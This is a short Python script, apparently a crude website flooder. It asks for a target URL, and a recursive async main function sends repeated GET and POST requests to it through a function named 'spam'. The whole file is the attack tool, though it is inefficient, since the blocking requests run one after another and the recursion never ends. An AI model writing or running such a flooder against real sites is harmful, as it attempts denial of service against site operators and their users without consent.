import requests
import asyncio

urlTS = input('URL> ')

async def spam(url):
	requests.get(urlTS)
	requests.post(urlTS)
	print(f'[REQUEST] Sended')

async def main():
	print('[LOG] Runned "main"')
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(spam(urlTS))
	await asyncio.create_task(main())

asyncio.run(main())